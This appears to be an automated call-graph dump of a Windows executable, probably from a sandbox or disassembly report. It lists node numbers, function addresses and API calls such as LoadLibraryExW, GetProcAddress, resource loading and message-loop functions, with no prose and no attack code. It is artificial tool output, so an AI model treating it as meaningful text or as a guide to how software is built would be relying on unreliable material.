103739->103743 103746 d44477 48 API calls 103739->103746 103742 d443e7 103741->103742 103741->103743 103924 d43320 103742->103924 103751 d44477 48 API calls 103743->103751 103745 d44477 48 API calls 103748 db217d 103745->103748 103749 d443b8 _wcscpy 103746->103749 103748->103743 103755 d44477 48 API calls 103749->103755 103750 d443ff 103935 d514a0 103750->103935 103753 db21ab 103751->103753 103753->103753 103754 d4440f 103756 d514a0 48 API calls 103754->103756 103758 d44477 48 API calls 103754->103758 103759 d44451 Mailbox 103754->103759 103951 d47bef 48 API calls 103754->103951 103755->103741 103756->103754 103758->103754 103759->103650 103761 d43c1f 103760->103761 103762 db3ce4 _memset 103760->103762 104423 d431b8 103761->104423 103764 db3cf6 GetOpenFileNameW 103762->103764 103764->103761 103766 d437c0 103764->103766 103765 d43c28 104430 d43a67 SHGetMalloc 103765->104430 103766->103653 103766->103661 103768 d43c31 104435 d43b45 GetFullPathNameW 103768->104435 104518 d4a716 103772->104518 103774 d43501 103775 d43575 103774->103775 104529 d421dd 86 API calls 103774->104529 103775->103662 103775->103666 103777 d4350a 103777->103775 104530 d45460 88 API calls Mailbox 103777->104530 103779 d43513 103779->103775 103780 d43517 GetFullPathNameW 103779->103780 103781 d47e53 48 API calls 103780->103781 103782 d43541 103781->103782 103783 d47e53 48 API calls 103782->103783 103784 d4354e 103783->103784 103785 db66b4 _wcscat 103784->103785 103786 d47e53 48 API calls 103784->103786 103786->103775 103788 db21b0 103787->103788 103789 d4310f 103787->103789 104533 d4318a 103789->104533 103793 d43185 103794 d42e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103793->103794 103794->103673 103796 d4e216 103795->103796 103816 d4e226 Mailbox 103795->103816 103797 d4e670 103796->103797 103796->103816 104570 d5ecee 255 API calls 103797->104570 103798 d8d520 86 API calls 103798->103816 103799 d4e4e7 103801 d43842 103799->103801 104546 d4322e 103799->104546 103801->103653 103855 d42b94 Shell_NotifyIconW _memset 103801->103855 103804 d4e26c PeekMessageW 103804->103816 103806 d4e695 LockWindowUpdate DestroyWindow GetMessageW 103806->103801 103809 d4e6c7 103806->103809 103807 db5b13 Sleep 103807->103816 103810 db62a7 TranslateMessage DispatchMessageW GetMessageW 103809->103810 103810->103801 103810->103810 103812 d4e657 PeekMessageW 103812->103816 103813 d4e517 timeGetTime 103813->103816 103815 d4c935 48 API calls 103815->103816 103816->103798 103816->103799 103816->103804 103816->103807 103816->103812 103816->103813 103816->103815 103817 d4e641 TranslateMessage DispatchMessageW 103816->103817 103818 db5dfc WaitForSingleObject 103816->103818 103819 d6010a 48 API calls 103816->103819 103821 d41000 231 API calls 103816->103821 103822 db6147 Sleep 103816->103822 103824 db5cce Mailbox 103816->103824 103825 d4e6cc timeGetTime 103816->103825 103828 db5feb Sleep 103816->103828 103835 db5cea Sleep 103816->103835 103841 d5cf79 49 API calls 103816->103841 103852 d4caee 48 API calls 103816->103852 103853 d4d380 55 API calls 103816->103853 104539 d4e7e0 103816->104539 104564 d4e7b0 255 API calls Mailbox 103816->104564 104565 d4ea00 255 API calls 2 library calls 103816->104565 104566 d544e0 255 API calls Mailbox 103816->104566 104567 d53680 255 API calls 2 library calls 103816->104567 104568 d5f381 TranslateAcceleratorW 103816->104568 104569 d5ed1a IsDialogMessageW GetClassLongW 103816->104569 104572 da8b20 48 API calls 103816->104572 104576 d4fa40 103816->104576 103817->103812 103818->103816 103823 db5e19 GetExitCodeProcess CloseHandle 103818->103823 103819->103816 103820 d4d3d2 48 API calls 103820->103824 103821->103816 103822->103824 103823->103816 103824->103816 103824->103820 103830 db61de GetExitCodeProcess 103824->103830 103832 d5e3a5 timeGetTime 103824->103832 103824->103835 103836 da8a48 108 API calls 103824->103836 103837 d41dce 107 API calls 103824->103837 103839 db5cd7 Sleep 103824->103839 103840 db6266 Sleep 103824->103840 103843 d4caee 48 API calls 103824->103843 103847 d4d380 55 API calls 103824->103847 104573 d856dc 49 API calls Mailbox 103824->104573 104574 d5cf79 49 API calls 103824->104574 104575 d41000 255 API calls 103824->104575 104615 d9d12a 50 API calls 103824->104615 104616 d88355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103824->104616 104617 d86f5b 63 API calls 3 library calls 103824->104617 104571 d5cf79 49 API calls 103825->104571 103828->103824 103833 db620a CloseHandle 103830->103833 103834 db61f4 WaitForSingleObject 103830->103834 103832->103824 103833->103824 103834->103816 103834->103833 103835->103816 103836->103824 103837->103824 103839->103835 103840->103816 103841->103816 103843->103824 103847->103824 103852->103816 103853->103816 103854->103675 103855->103653 103856->103662 103857->103670 103859 d4cafd __wsetenvp _memmove 103858->103859 103860 d6010a 48 API calls 103859->103860 103861 d4cb3b 103860->103861 103861->103681 103861->103682 103862->103685 103863->103690 103864->103687 103865->103687 103867 d4d3d2 48 API calls 103866->103867 103868 d43c80 103867->103868 103869 d4a359 103868->103869 103870 d4a366 __ftell_nolock 103869->103870 103871 d47e53 48 API calls 103870->103871 103881 d4a4cc Mailbox 103870->103881 103873 d4a398 103871->103873 103875 d4a3ce Mailbox 103873->103875 103956 d4a4f6 103873->103956 103874 d4a4f6 48 API calls 103874->103875 103875->103874 103876 d4a49f 103875->103876 103878 d4caee 48 API calls 103875->103878 103875->103881 103959 d45b47 48 API calls _memmove 103875->103959 103877 d4caee 48 API calls 103876->103877 103876->103881 103879 d4a4c0 103877->103879 103878->103875 103960 d45b47 48 API calls _memmove 103879->103960 103881->103700 103961 d43f9b 103883->103961 103886 d434ea 103895 d48182 103886->103895 103889 db34c3 103890 d628ca _free 47 API calls 103889->103890 103892 db34d0 103890->103892 103893 d43e39 84 API calls 103892->103893 103894 db34d9 103893->103894 103894->103894 103896 d6010a 48 API calls 103895->103896 103897 d442ad 103896->103897 103897->103705 103899 d4d38b 103898->103899 103900 d4d3b4 103899->103900 104412 d4d772 55 API calls 103899->104412 103900->103708 103905 d4d2df 103902->103905 103906 d4d30a 103902->103906 103903 d4d2e6 103903->103906 104413 d4d349 53 API calls 103903->104413 103905->103903 104414 d4d349 53 API calls 103905->104414 103906->103716 103909 d44481 103908->103909 103910 d4449a 103908->103910 103912 d4c935 48 API calls 103909->103912 103911 d47e53 48 API calls 103910->103911 103913 d44347 103911->103913 103912->103913 103914 d61bc7 103913->103914 103915 d61bd3 103914->103915 103916 d61c48 103914->103916 103923 d61bf8 103915->103923 104415 d6889e 47 API calls __getptd_noexit 103915->104415 104417 d61c5a 59 API calls 4 library calls 103916->104417 103919 d61c55 103919->103722 103920 d61bdf 104416 d67aa0 8 API calls __strnicmp_l 103920->104416 103922 d61bea 103922->103722 103923->103722 103925 d43334 103924->103925 103927 d43339 Mailbox 103924->103927 104418 d4342c 48 API calls 103925->104418 103933 d43347 103927->103933 104419 d4346e 48 API calls 103927->104419 103929 d6010a 48 API calls 103931 d433d8 103929->103931 103930 d43422 103930->103750 103932 d6010a 48 API calls 103931->103932 103934 d433e3 103932->103934 103933->103929 103933->103930 103934->103750 103934->103934 103936 d51606 103935->103936 103937 d514b2 103935->103937 103936->103754 103939 d6010a 48 API calls 103937->103939 103949 d514be 103937->103949 103940 db5299 103939->103940 103941 d6010a 48 API calls 103940->103941 103950 db52a4 103941->103950 103942 d514c9 103943 d5156d 103942->103943 103944 d6010a 48 API calls 103942->103944 103943->103754 103945 d515af 103944->103945 103946 d515c2 103945->103946 104420 d5d6b4 48 API calls 103945->104420 103946->103754 103948 d6010a 48 API calls 103948->103950 103949->103942 104421 d4346e 48 API calls 103949->104421 103950->103948 103950->103949 103951->103754 103953 d4c940 103952->103953 103954 d4c948 103952->103954 104422 d4d805 48 API calls _memmove 103953->104422 103954->103745 103957 d4b8a7 48 API calls 103956->103957 103958 d4a501 103957->103958 103958->103873 103959->103875 103960->103881 104026 d43f5d 103961->104026 103966 d43fc6 LoadLibraryExW 104036 d43e78 103966->104036 103967 db5830 103968 d43e39 84 API calls 103967->103968 103971 db5837 103968->103971 103973 d43e78 3 API calls 103971->103973 103975 db583f 103973->103975 103974 d43fed 103974->103975 103976 d43ff9 103974->103976 104062 d4417d 103975->104062 103977 d43e39 84 API calls 103976->103977 103979 d434e2 103977->103979 103979->103886 103985 d8cc82 103979->103985 103982 db5866 104070 d441cb 103982->104070 103984 db5873 103986 d441a7 83 API calls 103985->103986 103987 d8ccf1 103986->103987 104248 d8ce59 103987->104248 103990 d4417d 64 API calls 103991 d8cd1e 103990->103991 103992 d4417d 64 API calls 103991->103992 103993 d8cd2e 103992->103993 103994 d4417d 64 API calls 103993->103994 103995 d8cd49 103994->103995 103996 d4417d 64 API calls 103995->103996 103997 d8cd64 103996->103997 103998 d441a7 83 API calls 103997->103998 103999 d8cd7b 103998->103999 104000 d645ec std::exception::_Copy_str 47 API calls 103999->104000 104001 d8cd82 104000->104001 104002 d645ec std::exception::_Copy_str 47 API calls 104001->104002 104003 d8cd8c 104002->104003 104004 d4417d 64 API calls 104003->104004 104005 d8cda0 104004->104005 104006 d8c846 GetSystemTimeAsFileTime 104005->104006 104007 d8cdb3 104006->104007 104008 d8cdc8 104007->104008 104009 d8cddd 104007->104009 104010 d628ca _free 47 API calls 104008->104010 104011 d8ce42 104009->104011 104012 d8cde3 104009->104012 104014 d8cdce 104010->104014 104013 d628ca _free 47 API calls 104011->104013 104254 d8c251 104012->104254 104018 d8cd07 104013->104018 104016 d628ca _free 47 API calls 104014->104016 104016->104018 104018->103889 104020 d43e39 104018->104020 104019 d628ca _free 47 API calls 104019->104018 104021 d43e43 104020->104021 104025 d43e4a 104020->104025 104022 d64274 __fcloseall 83 API calls 104021->104022 104022->104025 104023 d43e59 104023->103889 104024 d43e6a FreeLibrary 104024->104023 104025->104023 104025->104024 104075 d43f20 104026->104075 104029 d43f85 104031 d43f96 104029->104031 104032 d43f8d FreeLibrary 104029->104032 104033 d64129 104031->104033 104032->104031 104083 d6413e 104033->104083 104035 d43fba 104035->103966 104035->103967 104162 d43eb3 104036->104162 104039 d43e9f 104040 d43eb1 104039->104040 104041 d43ea8 FreeLibrary 104039->104041 104043 d44010 104040->104043 104041->104040 104044 d6010a 48 API calls 104043->104044 104045 d44025 104044->104045 104046 d44bce 48 API calls 104045->104046 104047 d44031 _memmove 104046->104047 104048 d4406c 104047->104048 104050 d44161 104047->104050 104051 d44129 104047->104051 104049 d441cb 57 API calls 104048->104049 104058 d44075 104049->104058 104181 d8d03f 93 API calls 104050->104181 104170 d431f2 CreateStreamOnHGlobal 104051->104170 104054 d4417d 64 API calls 104054->104058 104056 d44109 104056->103974 104057 db5794 104059 d441a7 83 API calls 104057->104059 104058->104054 104058->104056 104058->104057 104176 d441a7 104058->104176 104060 db57a8 104059->104060 104061 d4417d 64 API calls 104060->104061 104061->104056 104063 db587d 104062->104063 104064 d4418f 104062->104064 104205 d644ae 104064->104205 104067 d8c846 104225 d8c6a0 104067->104225 104069 d8c85c 104069->103982 104071 d441da 104070->104071 104074 db58bf 104070->104074 104230 d64af5 104071->104230 104073 d441e2 104073->103984 104079 d43f32 104075->104079 104078 d43f08 LoadLibraryA GetProcAddress 104078->104029 104080 d43f28 104079->104080 104081 d43f3b LoadLibraryA 104079->104081 104080->104029 104080->104078 104081->104080 104082 d43f4c GetProcAddress 104081->104082 104082->104080 104086 d6414a __setmbcp 104083->104086 104084 d6415d 104131 d6889e 47 API calls __getptd_noexit 104084->104131 104086->104084 104088 d6418e 104086->104088 104087 d64162 104132 d67aa0 8 API calls __strnicmp_l 104087->104132 104102 d6f278 104088->104102 104091 d64193 104092 d6419c 104091->104092 104093 d641a9 104091->104093 104133 d6889e 47 API calls __getptd_noexit 104092->104133 104094 d641d3 104093->104094 104095 d641b3 104093->104095 104116 d6f390 104094->104116 104134 d6889e 47 API calls __getptd_noexit 104095->104134 104101 d6416d @_EH4_CallFilterFunc@8 __setmbcp 104101->104035 104103 d6f284 __setmbcp 104102->104103 104104 d68984 __lock 47 API calls 104103->104104 104114 d6f292 104104->104114 104105 d6f302 104136 d6f387 104105->104136 104106 d6f309 104141 d67660 47 API calls std::exception::_Copy_str 104106->104141 104109 d6f37c __setmbcp 104109->104091 104110 d6f310 104110->104105 104111 d6f31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 104110->104111 104111->104105 104112 d68a0c __mtinitlocknum 47 API calls 104112->104114 104114->104105 104114->104106 104114->104112 104139 d65ade 48 API calls __lock 104114->104139 104140 d65b48 LeaveCriticalSection LeaveCriticalSection _doexit 104114->104140 104125 d6f3b0 __wopenfile 104116->104125 104117 d6f3ca 104146 d6889e 47 API calls __getptd_noexit 104117->104146 104118 d6f585 104118->104117 104122 d6f5e8 104118->104122 104120 d6f3cf 104147 d67aa0 8 API calls __strnicmp_l 104120->104147 104143 d77179 104122->104143 104123 d641de 104135 d64200 LeaveCriticalSection LeaveCriticalSection _fseek 104123->104135 104125->104117 104125->104118 104148 d6247b 59 API calls 3 library calls 104125->104148 104127 d6f57e 104127->104118 104149 d6247b 59 API calls 3 library calls 104127->104149 104129 d6f59d 104129->104118 104150 d6247b 59 API calls 3 library calls 104129->104150 104131->104087 104132->104101 104133->104101 104134->104101 104135->104101 104142 d68ae8 LeaveCriticalSection 104136->104142 104138 d6f38e 104138->104109 104139->104114 104140->104114 104141->104110 104142->104138 104151 d76961 104143->104151 104145 d77192 104145->104123 104146->104120 104147->104123 104148->104127 104149->104129 104150->104118 104153 d7696d __setmbcp 104151->104153 104152 d7697f 104154 d6889e __setmbcp 47 API calls 104152->104154 104153->104152 104155 d769b6 104153->104155 104156 d76984 104154->104156 104158 d76a28 __wsopen_helper 110 API calls 104155->104158 104157 d67aa0 __strnicmp_l 8 API calls 104156->104157 104161 d7698e __setmbcp 104157->104161 104159 d769d3 104158->104159 104160 d769fc __wsopen_helper LeaveCriticalSection 104159->104160 104160->104161 104161->104145 104166 d43ec5 104162->104166 104165 d43ef0 LoadLibraryA GetProcAddress 104165->104039 104167 d43e91 104166->104167 104168 d43ece LoadLibraryA 104166->104168 104167->104039 104167->104165 104168->104167 104169 d43edf GetProcAddress 104168->104169 104169->104167 104171 d4320c FindResourceExW 104170->104171 104175 d43229 104170->104175 104172 db57d3 LoadResource 104171->104172 104171->104175 104173 db57e8 SizeofResource 104172->104173 104172->104175 104174 db57fc LockResource 104173->104174 104173->104175 104174->104175 104175->104048 104177 d441b6 104176->104177 104178 db589d 104176->104178 104182 d6471d 104177->104182 104180 d441c4 104180->104058 104181->104048 104185 d64729 __setmbcp 104182->104185 104183 d64737 104195 d6889e 47 API calls __getptd_noexit 104183->104195 104185->104183 104186 d6475d 104185->104186 104197 d65a9f 104186->104197 104187 d6473c 104196 d67aa0 8 API calls __strnicmp_l 104187->104196 104189 d64763 104203 d6468e 81 API calls 4 library calls 104189->104203 104192 d64772 104204 d64794 LeaveCriticalSection LeaveCriticalSection _fseek 104192->104204 104194 d64747 __setmbcp 104194->104180 104195->104187 104196->104194 104198 d65ad1 EnterCriticalSection 104197->104198 104199 d65aaf 104197->104199 104202 d65ac7 104198->104202 104199->104198 104200 d65ab7 104199->104200 104201 d68984 __lock 47 API calls 104200->104201 104201->104202 104202->104189 104203->104192 104204->104194 104208 d644c9 104205->104208 104207 d441a0 104207->104067 104209 d644d5 __setmbcp 104208->104209 104210 d644eb _memset 104209->104210 104211 d64518 104209->104211 104213 d64510 __setmbcp 104209->104213 104221 d6889e 47 API calls __getptd_noexit 104210->104221 104212 d65a9f __lock_file 48 API calls 104211->104212 104214 d6451e 104212->104214 104213->104207 104223 d642eb 62 API calls 6 library calls 104214->104223 104217 d64505 104222 d67aa0 8 API calls __strnicmp_l 104217->104222 104218 d64534 104224 d64552 LeaveCriticalSection LeaveCriticalSection _fseek 104218->104224 104221->104217 104222->104213 104223->104218 104224->104213 104228 d640da GetSystemTimeAsFileTime 104225->104228 104227 d8c6af 104227->104069 104229 d64108 __aulldiv 104228->104229 104229->104227 104231 d64b01 __setmbcp 104230->104231 104232 d64b24 104231->104232 104233 d64b0f 104231->104233 104235 d65a9f __lock_file 48 API calls 104232->104235 104244 d6889e 47 API calls __getptd_noexit 104233->104244 104237 d64b2a 104235->104237 104236 d64b14 104245 d67aa0 8 API calls __strnicmp_l 104236->104245 104246 d6479c 55 API calls 6 library calls 104237->104246 104240 d64b35 104247 d64b55 LeaveCriticalSection LeaveCriticalSection _fseek 104240->104247 104242 d64b47 104243 d64b1f __setmbcp 104242->104243 104243->104073 104244->104236 104245->104243 104246->104240 104247->104242 104253 d8ce6d __tzset_nolock _wcscmp 104248->104253 104249 d4417d 64 API calls 104249->104253 104250 d8cd03 104250->103990 104250->104018 104251 d8c846 GetSystemTimeAsFileTime 104251->104253 104252 d441a7 83 API calls 104252->104253 104253->104249 104253->104250 104253->104251 104253->104252 104255 d8c26a 104254->104255 104256 d8c25c 104254->104256 104258 d8c2af 104255->104258 104259 d64129 117 API calls 104255->104259 104271 d8c273 104255->104271 104257 d64129 117 API calls 104256->104257 104257->104255 104285 d8c4d4 64 API calls 3 library calls 104258->104285 104261 d8c294 104259->104261 104261->104258 104263 d8c29d 104261->104263 104262 d8c2f3 104264 d8c318 104262->104264 104265 d8c2f7 104262->104265 104263->104271 104295 d64274 104263->104295 104286 d8c0d1 104264->104286 104266 d8c304 104265->104266 104270 d64274 __fcloseall 83 API calls 104265->104270 104266->104271 104274 d64274 __fcloseall 83 API calls 104266->104274 104270->104266 104271->104019 104272 d8c346 104308 d8c376 90 API calls 104272->104308 104273 d8c326 104275 d8c333 104273->104275 104277 d64274 __fcloseall 83 API calls 104273->104277 104274->104271 104275->104271 104279 d64274 __fcloseall 83 API calls 104275->104279 104277->104275 104278 d8c34d 104309 d8c450 104278->104309 104279->104271 104282 d64274 __fcloseall 83 API calls 104283 d8c361 104282->104283 104283->104271 104284 d64274 __fcloseall 83 API calls 104283->104284 104284->104271 104285->104262 104287 d645ec std::exception::_Copy_str 47 API calls 104286->104287 104288 d8c0e0 104287->104288 104289 d645ec std::exception::_Copy_str 47 API calls 104288->104289 104290 d8c0f4 104289->104290 104291 d645ec std::exception::_Copy_str 47 API calls 104290->104291 104292 d8c108 104291->104292 104293 d8c450 47 API calls 104292->104293 104294 d8c11b 104292->104294 104293->104294 104294->104272 104294->104273 104296 d64280 __setmbcp 104295->104296 104297 d64294 104296->104297 104298 d642ac 104296->104298 104333 d6889e 47 API calls __getptd_noexit 104297->104333 104300 d642a4 __setmbcp 104298->104300 104301 d65a9f __lock_file 48 API calls 104298->104301 104300->104271 104303 d642be 104301->104303 104302 d64299 104334 d67aa0 8 API calls __strnicmp_l 104302->104334 104317 d64208 104303->104317 104308->104278 104310 d8c45d 104309->104310 104311 d8c463 104309->104311 104312 d628ca _free 47 API calls 104310->104312 104313 d628ca _free 47 API calls 104311->104313 104316 d8c474 104311->104316 104312->104311 104313->104316 104314 d8c354 104314->104282 104314->104283 104315 d628ca _free 47 API calls 104315->104314 104316->104314 104316->104315 104318 d64217 104317->104318 104319 d6422b 104317->104319 104376 d6889e 47 API calls __getptd_noexit 104318->104376 104321 d64227 104319->104321 104336 d63914 104319->104336 104335 d642e3 LeaveCriticalSection LeaveCriticalSection _fseek 104321->104335 104322 d6421c 104377 d67aa0 8 API calls __strnicmp_l 104322->104377 104329 d64245 104353 d6f782 104329->104353 104331 d6424b 104331->104321 104332 d628ca _free 47 API calls 104331->104332 104332->104321 104333->104302 104334->104300 104335->104300 104337 d63927 104336->104337 104341 d6394b 104336->104341 104338 d635c3 __fputwc_nolock 47 API calls 104337->104338 104337->104341 104339 d63944 104338->104339 104378 d6bd14 78 API calls 6 library calls 104339->104378 104342 d6f8e6 104341->104342 104343 d6423f 104342->104343 104344 d6f8f3 104342->104344 104346 d635c3 104343->104346 104344->104343 104345 d628ca _free 47 API calls 104344->104345 104345->104343 104347 d635e2 104346->104347 104348 d635cd 104346->104348 104347->104329 104379 d6889e 47 API calls __getptd_noexit 104348->104379 104350 d635d2 104380 d67aa0 8 API calls __strnicmp_l 104350->104380 104352 d635dd 104352->104329 104354 d6f78e __setmbcp 104353->104354 104355 d6f796 104354->104355 104356 d6f7ae 104354->104356 104405 d6886a 47 API calls __getptd_noexit 104355->104405 104357 d6f82b 104356->104357 104362 d6f7d8 104356->104362 104409 d6886a 47 API calls __getptd_noexit 104357->104409 104360 d6f79b 104406 d6889e 47 API calls __getptd_noexit 104360->104406 104361 d6f830 104410 d6889e 47 API calls __getptd_noexit 104361->104410 104381 d6b6a0 104362->104381 104366 d6f7a3 __setmbcp 104366->104331 104367 d6f838 104411 d67aa0 8 API calls __strnicmp_l 104367->104411 104368 d6f7de 104370 d6f7f1 104368->104370 104371 d6f7fc 104368->104371 104390 d6f84c 104370->104390 104407 d6889e 47 API calls __getptd_noexit 104371->104407 104374 d6f7f7 104408 d6f823 LeaveCriticalSection __unlock_fhandle 104374->104408 104376->104322 104377->104321 104378->104341 104379->104350 104380->104352 104382 d6b6ac __setmbcp 104381->104382 104383 d6b6f9 EnterCriticalSection 104382->104383 104385 d68984 __lock 47 API calls 104382->104385 104384 d6b71f __setmbcp 104383->104384 104384->104368 104386 d6b6d0 104385->104386 104387 d6b6ed 104386->104387 104388 d6b6db InitializeCriticalSectionAndSpinCount 104386->104388 104389 d6b723 ___lock_fhandle LeaveCriticalSection 104387->104389 104388->104387 104389->104383 104391 d6b957 __lseek_nolock 47 API calls 104390->104391 104394 d6f85a 104391->104394 104392 d6f8b0 104393 d6b8d1 __free_osfhnd 48 API calls 104392->104393 104399 d6f8b8 104393->104399 104394->104392 104395 d6b957 __lseek_nolock 47 API calls 104394->104395 104404 d6f88e 104394->104404 104397 d6f885 104395->104397 104396 d6b957 __lseek_nolock 47 API calls 104398 d6f89a CloseHandle 104396->104398 104401 d6b957 __lseek_nolock 47 API calls 104397->104401 104398->104392 104402 d6f8a6 GetLastError 104398->104402 104400 d6f8da 104399->104400 104403 d6887d __dosmaperr 47 API calls 104399->104403 104400->104374 104401->104404 104402->104392 104403->104400 104404->104392 104404->104396 104405->104360 104406->104366 104407->104374 104408->104366 104409->104361 104410->104367 104411->104366 104412->103900 104413->103906 104414->103903 104415->103920 104416->103922 104417->103919 104418->103927 104419->103933 104420->103946 104421->103942 104422->103954 104424 d431c7 104423->104424 104425 db4aa5 GetFullPathNameW 104423->104425 104480 d43bcf 104424->104480 104427 db4abd 104425->104427 104428 d431cd GetFullPathNameW 104429 d431e7 104428->104429 104429->103765 104431 d43a8b SHGetDesktopFolder 104430->104431 104432 d43ade 104430->104432 104431->104432 104433 d43a99 104431->104433 104432->103768 104433->104432 104434 d43ac8 SHGetPathFromIDListW 104433->104434 104434->104432 104436 d43b72 104435->104436 104437 d43ba9 104435->104437 104439 d43bcf 48 API calls 104436->104439 104437->104436 104438 d61bc7 _W_store_winword 59 API calls 104437->104438 104442 db33e5 104437->104442 104438->104437 104440 d43b7d 104439->104440 104484 d4197e 104440->104484 104444 d4197e 48 API calls 104445 d43b9f 104444->104445 104446 d43dcb 104445->104446 104447 d43f9b 136 API calls 104446->104447 104449 d43def 104447->104449 104448 db39f9 104450 d8cc82 122 API calls 104448->104450 104449->104448 104451 d43f9b 136 API calls 104449->104451 104452 db3a0e 104450->104452 104453 d43e02 104451->104453 104454 db3a2f 104452->104454 104455 db3a12 104452->104455 104453->104448 104456 d43e0a 104453->104456 104458 d6010a 48 API calls 104454->104458 104457 d43e39 84 API calls 104455->104457 104459 db3a1a 104456->104459 104460 d43e16 104456->104460 104457->104459 104479 db3a74 Mailbox 104458->104479 104515 d8757b 87 API calls _wprintf 104459->104515 104514 d4bdf0 163 API calls 8 library calls 104460->104514 104463 d43e2e 104463->103766 104464 db3a28 104464->104454 104465 db3c24 104466 d628ca _free 47 API calls 104465->104466 104467 db3c2c 104466->104467 104468 d43e39 84 API calls 104467->104468 104473 db3c35 104468->104473 104472 d628ca _free 47 API calls 104472->104473 104473->104472 104475 d43e39 84 API calls 104473->104475 104517 d832b0 86 API calls 4 library calls 104473->104517 104475->104473 104476 d4caee 48 API calls 104476->104479 104479->104465 104479->104473 104479->104476 104490 d830ac 104479->104490 104493 d8a525 104479->104493 104499 d4b6d0 104479->104499 104508 d4a870 104479->104508 104516 d82fcd 60 API calls 2 library calls 104479->104516 104481 d43bd9 __wsetenvp 104480->104481 104482 d6010a 48 API calls 104481->104482 104483 d43bee _wcscpy 104482->104483 104483->104428 104485 d41990 104484->104485 104489 d419af _memmove 104484->104489 104487 d6010a 48 API calls 104485->104487 104486 d6010a 48 API calls 104488 d419c6 104486->104488 104487->104489 104488->104444 104489->104486 104491 d6010a 48 API calls 104490->104491 104492 d830dc _memmove 104491->104492 104492->104479 104492->104492 104494 d8a530 104493->104494 104495 d6010a 48 API calls 104494->104495 104496 d8a547 104495->104496 104497 d4caee 48 API calls 104496->104497 104498 d8a556 104496->104498 104497->104498 104498->104479 104500 d4b789 104499->104500 104503 d4b6e3 _memmove 104499->104503 104502 d6010a 48 API calls 104500->104502 104501 d6010a 48 API calls 104504 d4b6ea 104501->104504 104502->104503 104503->104501 104505 d4b71b 104504->104505 104506 d6010a 48 API calls 104504->104506 104505->104479 104507 d4b74d 104506->104507 104507->104479 104509 d4a883 104508->104509 104513 d4a93d 104508->104513 104511 d6010a 48 API calls 104509->104511 104512 d4a8c1 104509->104512 104509->104513 104510 d6010a 48 API calls 104510->104512 104511->104512 104512->104510 104512->104513 104513->104479 104514->104463 104515->104464 104516->104479 104517->104473 104519 d4a72c 104518->104519 104525 d4a848 104518->104525 104520 d6010a 48 API calls 104519->104520 104519->104525 104521 d4a753 104520->104521 104522 d6010a 48 API calls 104521->104522 104523 d4a7c5 104522->104523 104523->104525 104527 d4a870 48 API calls 104523->104527 104528 d4b6d0 48 API calls 104523->104528 104531 d4ace0 91 API calls 2 library calls 104523->104531 104532 d8a3ee 48 API calls 104523->104532 104525->103774 104527->104523 104528->104523 104529->103777 104530->103779 104531->104523 104532->104523 104534 db4ad8 EnumResourceNamesW 104533->104534 104535 d431a2 LoadImageW 104533->104535 104536 d43118 RegisterClassExW 104534->104536 104535->104536 104537 d42f58 GetSysColorBrush RegisterClassExW RegisterWindowMessageW 104536->104537 104538 d42fe9 ImageList_Create LoadIconW ImageList_ReplaceIcon 104537->104538 104538->103793 104540 d4e7fd 104539->104540 104541 d4e80f 104539->104541 104618 d4dcd0 104540->104618 104649 d8d520 86 API calls 4 library calls 104541->104649 104543 d4e806 104543->103816 104545 db98e8 104545->104545 104657 d4325d 104546->104657 104548 d4323b 104549 d4325a 104548->104549 104551 db66cc 104548->104551 104549->103801 104552 d5ec33 104549->104552 104551->104548 104661 d8a31d 13 API calls Mailbox 104551->104661 104553 d4caee 48 API calls 104552->104553 104554 d5ec5d 104553->104554 104555 d4d380 55 API calls 104554->104555 104556 d5ec6d Mailbox 104555->104556 104557 d4caee 48 API calls 104556->104557 104558 d5ec96 104557->104558 104559 d4d380 55 API calls 104558->104559 104562 d5eca6 Mailbox 104559->104562 104560 d5ecdb 104560->103806 104562->104560 104663 d5cf79 49 API calls 104562->104663 104664 d8d80a 255 API calls 104562->104664 104564->103816 104565->103816 104566->103816 104567->103816 104568->103816 104569->103816 104570->103799 104571->103816 104572->103816 104573->103824 104574->103824 104575->103824 104577 d4fa60 104576->104577 104613 d4fa8e Mailbox _memmove 104576->104613 104578 d6010a 48 API calls 104577->104578 104578->104613 104579 d61b2a 52 API calls __cinit 104579->104613 104580 d5105e 104581 d4c935 48 API calls 104580->104581 104606 d4fbf1 Mailbox 104581->104606 104582 d7a599 InterlockedDecrement 104582->104613 104583 d50119 104690 d8d520 86 API calls 4 library calls 104583->104690 104586 d50dee 104672 d4d89e 104586->104672 104588 d51063 104689 d8d520 86 API calls 4 library calls 104588->104689 104589 d6010a 48 API calls 104589->104613 104590 d50dfa 104594 d4d89e 50 API calls 104590->104594 104592 dbb772 104691 d8d520 86 API calls 4 library calls 104592->104691 104597 d50e83 104594->104597 104596 d4c935 48 API calls 104596->104613 104601 d4caee 48 API calls 104597->104601 104598 d4d3d2 48 API calls 104598->104613 104600 dbb7d2 104612 d510f1 Mailbox 104601->104612 104603 d51230 104603->104606 104688 d8d520 86 API calls 4 library calls 104603->104688 104606->103816 104607 d4fa40 255 API calls 104607->104613 104610 dbb583 104686 d8d520 86 API calls 4 library calls 104610->104686 104687 d8d520 86 API calls 4 library calls 104612->104687 104613->104579 104613->104580 104613->104582 104613->104583 104613->104586 104613->104588 104613->104589 104613->104590 104613->104592 104613->104596 104613->104597 104613->104598 104613->104603 104613->104606 104613->104607 104613->104610 104613->104612 104665 da798d 104613->104665 104670 d4f6d0 255 API calls 2 library calls 104613->104670 104671 d51620 59 API calls Mailbox 104613->104671 104682 d9ee52 82 API calls 2 library calls 104613->104682 104683 d9ef9d 90 API calls Mailbox 104613->104683 104684 d8b020 48 API calls 104613->104684 104685 d9e713 255 API calls Mailbox 104613->104685 104615->103824 104616->103824 104617->103824 104619 d4fa40 255 API calls 104618->104619 104632 d4dd0f _memmove 104619->104632 104620 db8dbe 104656 d8d520 86 API calls 4 library calls 104620->104656 104622 db8ddc 104622->104622 104623 d4dd70 104623->104543 104624 d4e12b Mailbox 104626 d6010a 48 API calls 104624->104626 104625 d4e051 104627 d4e066 104625->104627 104628 db8daf 104625->104628 104641 d4decb _memmove 104626->104641 104630 d6010a 48 API calls 104627->104630 104655 d9d1da 50 API calls 104628->104655 104638 d4df64 104630->104638 104631 d6010a 48 API calls 104631->104632 104632->104620 104632->104623 104632->104624 104632->104631 104633 d4deb7 104632->104633 104637 d4df29 104632->104637 104633->104624 104636 d4dec4 104633->104636 104634 d6010a 48 API calls 104635 d4def6 104634->104635 104635->104637 104650 d54320 255 API calls 104635->104650 104640 d6010a 48 API calls 104636->104640 104637->104625 104637->104638 104639 db8d9e 104637->104639 